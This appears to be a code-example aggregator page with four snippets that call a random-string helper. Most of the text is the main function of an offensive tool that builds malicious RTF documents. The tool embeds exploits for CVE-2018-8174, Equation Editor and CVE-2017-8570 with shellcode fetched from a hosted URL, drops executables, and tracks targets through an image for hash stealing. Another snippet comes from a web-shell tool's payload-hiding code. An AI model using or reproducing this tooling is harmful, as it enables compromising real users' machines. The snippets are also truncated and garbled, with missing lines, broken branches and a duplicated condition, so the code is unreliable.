コード例 #1
    def write_to_tempfile(kls, data_uri):
        *placeholder method*

        this method will create a new TempFile (or cStringIO) with the
        contents of the data_uri which can then be POST'ed to kobocat in
        a mock submission.
        (ftype, fext, fcont) = kls._attachment_split(data_uri)
        fname = 'a%s.%s' % (randstr(10), fext)
        return (fname, '/tmp/path/to/%s' % fname)
コード例 #2
ファイル: stegomsg.py プロジェクト: ahmadkarlam/Weevely
    def _replace(self, match):
        if match.group('integer') and match.group('integer_mult_start'):
            start = int(match.group('integer_mult_start'))

            end = start
            if match.group('integer_mult_end'):
                end = int(match.group('integer_mult_end'))

            return utils.randstr(end, start, string.digits)

        elif match.group('character') and match.group('character_mult_start'):

            start = int(match.group('character_mult_start'))

            end = start
            if match.group('character_mult_end'):
                end = int(match.group('character_mult_end'))

            return utils.randstr(end, start, string.ascii_lowercase)

        elif match.group('domain'):
            return random.choice(['it', 'es', 'uk', 'en', 'com'])

        elif match.group('payload'):
            current_payload = (self.start_delimiter +
                               self.chunked_payload.next() +
            start = int(match.group('payload_mult_start'))

            # Eventually add padding if current_payload is smaller than minsize
            if len(current_payload) < start:
                padding_length = start - len(current_payload)
                current_payload += utils.randstr(padding_length,

            return current_payload
コード例 #3
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-D', '--debug', action='store_true', help='enable debug')
    parser.add_argument('-l', '--list', action='store_true', help='list exploits and additions')

    parser.add_argument('-u', '--use', action='append', help='add exploit (see --list)')
    parser.add_argument('--use-cve', action='append', help='add exploit (by CVE)')
            help='name for dropped EXE file (for exploits equation and composite)')
    parser.add_argument('--template', default=utils.basedir(default_rtf),
            help='RTF template to add exploit to (default: {})'.format(default_rtf))
    parser.add_argument('--fake-path', default=default_fakepath,
            help='fake path for packaged files (default: {})'.format(default_fakepath))
    parser.add_argument('-o', '--out', help='RTF output')

    king = parser.add_argument_group('king exploit', 'King exploit (CVE-2018-8174) options')
    king.add_argument('--king-shellcode', default=utils.basedir(default_king_shellcode),
            help='shellcode for CVE-2018-8174 (default: {})'.format(default_king_shellcode))
    king.add_argument('--king-url', help='URL where HTML will be hosted for king exploit (max: 39 chars)')
    king.add_argument('--king-html-out', help='output file for king HTML')

    composite = parser.add_argument_group('composite exploit', 'Composite moniker exploit (CVE-2017-8570) options')
    composite.add_argument('--composite-sct', help='use this SCT file instead of generating one')

    additions = parser.add_argument_group('additions', 'Additional things to add to the RTF')
    additions.add_argument('--image-track', help='include an image from this URL, for tracking and hash stealing')
    additions.add_argument('-p', '--package', action='append',
            help='files to add as packages. will by dropped in temp (append fake name with colon)')
    args = parser.parse_args()

    # -D/--debug
    utils.enable_debug = args.debug

    # -l/--list
    if args.list:
        print('exploits (use with --use):')
        for exploit, cve in exploit_to_cve.items():
            print(' - {} ({})'.format(exploit, cve))
        print(' - image tracking and hash stealing (use with --image-track)')
        print(' - embed file as package to be dropped in %temp% (use with --package)')

    # read original rtf
    with open(args.template, 'r') as fp:
        rtf = fp.read()

    # remove last }
    rtf = rtf.rstrip()
    if rtf[-1] != '}':
        bye('} must be the last character of the rtf')
    rtf = rtf[:-1]

    rtf += '\n' * 3

    # use these exploits
    used = []
    if args.use:
        # -u/--use
        for item in args.use:
            for exploit in item.split(','):
                exploit = exploit.lower()

                if exploit == 'all':
                    # use all exploits
                    used += supported_exploits
                    # check to make sure it exists
                    if exploit not in supported_exploits:
                        bye('unknown exploit: {}'.format(exploit))
        # defaults
        used = default_exploits

    # --use-cve
    if args.use_cve:
        for item in args.use_cve:
            for cve in item.split(','):
                cve = cve.lower()
                # check to make sure it exists
                if cve not in cve_to_exploit:
                    bye('unknown CVE: {}'.format(cve))

    # sort the exploits by reliability
    used = list(set(used))
    used = sorted(used, key=lambda x: supported_exploits.index(x))

    # embed packages
    packages = None
    if args.package:
        packages = parse_packages(args.package)
        for package, fakename in packages:
            package = rtf_package.Package(package, fakename=fakename,
            rtf += package.build_package()

    # track with image (--image-track)
    if args.image_track:
        yes('adding image track: {}'.format(args.image_track))
        rtf += generate_image(args.image_track)

    # generate exploits
    for exploit in used:
        yes('adding exploit {} ({})'.format(exploit, exploit_to_cve[exploit]))
        if exploit == 'king':
            # check args
            if not args.king_url:
                bye('specify --king-url')
            if not args.king_html_out:
                bye('specify --king-html-out')

            # if using the default shellcode, make sure it'll work
            if args.king_shellcode == utils.basedir(default_king_shellcode):
                if (args.exe_name and args.exe_name != default_king_exe_name) or \
                    not check_packages(packages, default_king_exe_name):
                    bye('the default king shellcode expects an executable named {} to be packaged'.format(default_king_exe_name))

            # make rtf part
            rtf_part = exploits.king.generate_rtf(args.king_url)
            if not rtf_part:
                bye('king url too long: {}'.format(args.king_url))
            rtf += rtf_part

            # read shellcode
            with open(args.king_shellcode, 'rb') as fp:
                shellcode = fp.read()

            # make html part
            html = exploits.king.generate_html(shellcode)

            # output html
            ok('writing king html to {}'.format(args.king_html_out))
            ok('rtf will retrive king exploit from {}'.format(args.king_url))
            with open(args.king_html_out, 'w+') as fp:
        elif exploit in ['equation1', 'equation2']:
            if not check_packages(packages, args.exe_name):
                bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))

            # exe name is --exe-name or the package if there's only one
            exe_name = args.exe_name if args.exe_name else packages[0][1]

            if exploit == 'equation2':
                rtf += exploits.equation.generate_rtf1(exe_name)
            elif exploit == 'equation2':
                rtf += exploits.equation.generate_rtf2(exe_name)
        elif exploit == 'composite':
            if not check_packages(packages, args.exe_name):
                bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))

            # exe name is --exe-name or the package if there's only one
            exe_name = args.exe_name if args.exe_name else packages[0][1]

            # add SCT if needed
            with tempfile.NamedTemporaryFile() as temp:
                sct_name = utils.randstr(15, 15) + '.sct'
                if args.composite_sct:
                    # use user SCT
                    package = rtf_package.Package(args.composite_sct,
                    rtf += package.build_package()
                    # build an SCT
                    sct = exploits.composite.generate_sct(exe_name)

                    package = rtf_package.Package(temp.name,
                    rtf += package.build_package()

            rtf += exploits.composite.generate_rtf(sct_name)
            raise RuntimeError('unknown exploit')

    # add back an enclosing }
    rtf += '}\n'

    # write new rtf
    if args.out:
        ok('writing rtf to {}'.format(args.out))
        with open(args.out, 'w+') as fp:
        bye('specify output RTF file with --out')
コード例 #4
ファイル: app.py プロジェクト: jugyo/twiwt-chat
def gen_chat_name(command):
    if command == '.random':
        return utils.randstr(10)
        return command[1:-1]